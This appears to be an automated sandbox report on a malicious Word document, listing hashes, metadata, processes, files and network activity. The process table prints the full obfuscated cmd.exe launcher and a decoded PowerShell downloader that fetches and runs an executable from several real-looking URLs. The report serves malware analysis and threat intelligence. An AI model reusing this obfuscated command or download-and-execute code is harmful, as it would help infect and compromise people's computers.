File name: | 3b3dce32f973f3754b3f4c06c9c1274232776e3795eb8af038f8e06b5f513a0a |
Full analysis: | https://app.any.run/tasks/88dd88aa-5198-48ed-9c06-8e0a1de038a6 |
Verdict: | Malicious activity |
Analysis date: | January 10, 2019, 14:53:50 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 10 16:20:00 2018, Last Saved Time/Date: Mon Dec 10 16:20:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 12, Security: 0 |
MD5: | 3250C02D2B234C6E346DA65EC5B6E1F7 |
SHA1: | E7F828C025BBC3FB6C959CE61C6B384712C58235 |
SHA256: | 3B3DCE32F973F3754B3F4C06C9C1274232776E3795EB8AF038F8E06B5F513A0A |
SSDEEP: | 1536:Gt81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9slK1T5SU2T/:08GhDS0o9zTGOZD6EbzCdN15SUi |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: | |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 13 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 12 |
Words: | 2 |
Pages: | 1 |
ModifyDate: | 2018:12:10 16:20:00 |
CreateDate: | 2018:12:10 16:20:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2984 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\3b3dce32f973f3754b3f4c06c9c1274232776e3795eb8af038f8e06b5f513a0a.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3940 | c:\wYAuLnHwQ\OPkulkQKDpm\FBZbkIHdJsHiS\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set FTuo=AFiHrhSoSijXZqdKrqucHOMtdIWldDC.+8V\2kB;fP{a =)1'@sRT36G4gLpY/}xEwNQbne0-$m(v9yz,:&&for %9 in (73,79,67,26,45,48,21,5,65,48,39,73,15,67,79,45,69,70,65,72,7,68,10,70,19,23,44,66,70,23,31,26,70,68,30,27,9,70,69,23,39,73,25,58,16,45,48,5,23,23,59,81,61,61,65,65,65,31,9,19,43,16,79,7,69,70,31,19,7,74,61,55,70,59,19,36,9,12,49,5,23,23,59,81,61,61,50,43,69,23,43,78,43,31,69,70,23,61,26,47,26,38,71,38,18,41,53,67,49,5,23,23,59,81,61,61,9,69,69,7,76,43,28,31,69,27,61,50,36,60,55,34,30,17,70,49,5,23,23,59,81,61,61,16,7,68,65,43,27,27,50,31,19,7,74,61,54,19,8,56,22,15,77,34,79,49,5,23,23,59,81,61,61,50,19,7,23,23,74,43,79,79,43,31,19,7,74,61,19,59,12,34,55,15,25,79,68,48,31,8,59,27,9,23,75,48,49,48,46,39,73,29,11,0,45,48,51,8,67,48,39,73,68,67,34,44,45,44,48,47,54,47,48,39,73,50,34,23,45,48,74,10,52,48,39,73,9,41,10,45,73,70,69,76,81,23,70,74,59,32,48,35,48,32,73,68,67,34,32,48,31,70,63,70,48,39,40,7,16,70,43,19,5,75,73,34,58,15,44,9,69,44,73,25,58,16,46,42,23,16,78,42,73,15,67,79,31,29,7,65,69,27,7,43,28,1,9,27,70,75,73,34,58,15,80,44,73,9,41,10,46,39,73,51,9,7,45,48,9,8,8,48,39,25,40,44,75,75,55,70,23,72,25,23,70,74,44,73,9,41,10,46,31,27,70,69,57,23,5,44,72,57,70,44,33,71,71,71,71,46,44,42,25,69,76,7,37,70,72,25,23,70,74,44,73,9,41,10,39,73,64,69,18,45,48,10,16,68,48,39,68,16,70,43,37,39,62,62,19,43,23,19,5,42,62,62,73,10,5,79,45,48,10,10,41,48,39,91)do set f1by=!f1by!!FTuo:~%9,1!&&if %9 equ 91 echo !f1by:~-437!|FOR /F "delims=.4zXs tokens=4" %m IN ('assoc^^^|findstr ellX')DO %m -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2504 | CmD /V:/C"set FTuo=AFiHrhSoSijXZqdKrqucHOMtdIWldDC.+8V\2kB;fP{a =)1'@sRT36G4gLpY/}xEwNQbne0-$m(v9yz,:&&for %9 in (73,79,67,26,45,48,21,5,65,48,39,73,15,67,79,45,69,70,65,72,7,68,10,70,19,23,44,66,70,23,31,26,70,68,30,27,9,70,69,23,39,73,25,58,16,45,48,5,23,23,59,81,61,61,65,65,65,31,9,19,43,16,79,7,69,70,31,19,7,74,61,55,70,59,19,36,9,12,49,5,23,23,59,81,61,61,50,43,69,23,43,78,43,31,69,70,23,61,26,47,26,38,71,38,18,41,53,67,49,5,23,23,59,81,61,61,9,69,69,7,76,43,28,31,69,27,61,50,36,60,55,34,30,17,70,49,5,23,23,59,81,61,61,16,7,68,65,43,27,27,50,31,19,7,74,61,54,19,8,56,22,15,77,34,79,49,5,23,23,59,81,61,61,50,19,7,23,23,74,43,79,79,43,31,19,7,74,61,19,59,12,34,55,15,25,79,68,48,31,8,59,27,9,23,75,48,49,48,46,39,73,29,11,0,45,48,51,8,67,48,39,73,68,67,34,44,45,44,48,47,54,47,48,39,73,50,34,23,45,48,74,10,52,48,39,73,9,41,10,45,73,70,69,76,81,23,70,74,59,32,48,35,48,32,73,68,67,34,32,48,31,70,63,70,48,39,40,7,16,70,43,19,5,75,73,34,58,15,44,9,69,44,73,25,58,16,46,42,23,16,78,42,73,15,67,79,31,29,7,65,69,27,7,43,28,1,9,27,70,75,73,34,58,15,80,44,73,9,41,10,46,39,73,51,9,7,45,48,9,8,8,48,39,25,40,44,75,75,55,70,23,72,25,23,70,74,44,73,9,41,10,46,31,27,70,69,57,23,5,44,72,57,70,44,33,71,71,71,71,46,44,42,25,69,76,7,37,70,72,25,23,70,74,44,73,9,41,10,39,73,64,69,18,45,48,10,16,68,48,39,68,16,70,43,37,39,62,62,19,43,23,19,5,42,62,62,73,10,5,79,45,48,10,10,41,48,39,91)do set f1by=!f1by!!FTuo:~%9,1!&&if %9 equ 91 echo !f1by:~-437!|FOR /F "delims=.4zXs tokens=4" %m IN ('assoc^^^|findstr ellX')DO %m -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2636 | C:\Windows\system32\cmd.exe /S /D /c" echo $zQW='Ohw';$KQz=new-object Net.WebClient;$ILr='http://www.icarzone.com/Gepc2iZ@http://santaya.net/W1WB0BuP3Q@http://innovad.nl/s2YGVCqe@http://robwalls.com/6cS4MK9Vz@http://scottmazza.com/cpZVGKIzb'.Split('@');$DXA='RSQ';$bQV = '161';$sVt='mjT';$iPj=$env:temp+'\'+$bQV+'.exe';foreach($VLK in $ILr){try{$KQz.DownloadFile($VLK, $iPj);$Rio='iSS';If ((Get-Item $iPj).length -ge 80000) {Invoke-Item $iPj;$Enu='jrb';break;}}catch{}}$jhz='jjP';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2676 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=.4zXs tokens=4" %m IN ('assoc^|findstr ellX') DO %m -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3108 | C:\Windows\system32\cmd.exe /c assoc|findstr ellX | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3336 | C:\Windows\system32\cmd.exe /S /D /c" assoc" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3392 | findstr ellX | C:\Windows\system32\findstr.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
932 | PowerShell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2984 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE6F9.tmp.cvr | — | |
MD5:— | SHA256:— | |||
932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6B2US3NFZGYOAQYMKLSR.temp | — | |
MD5:— | SHA256:— | |||
2984 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:633EDCAF70A08EA4C8F9489679EF5BF4 | SHA256:446A4274C3E9935A40A0EA6332996E3ABECA0B7D59EB8A541F56397F29158E6E | |||
932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f560.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2984 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$3dce32f973f3754b3f4c06c9c1274232776e3795eb8af038f8e06b5f513a0a.doc | pgc | |
MD5:D9730EFA14D4FDE28CB149566B99EE93 | SHA256:265EE606B57FD179B52B185B2FCC6096C8C278C722422BA7529509AEA3C853C7 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
932 | powershell.exe | GET | — | 103.41.233.137:80 | http://www.icarzone.com/Gepc2iZ | CN | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
932 | powershell.exe | 103.41.233.137:80 | www.icarzone.com | Cloud Computing Corporation | CN | malicious |
Domain | IP | Reputation |
---|---|---|
www.icarzone.com | | malicious |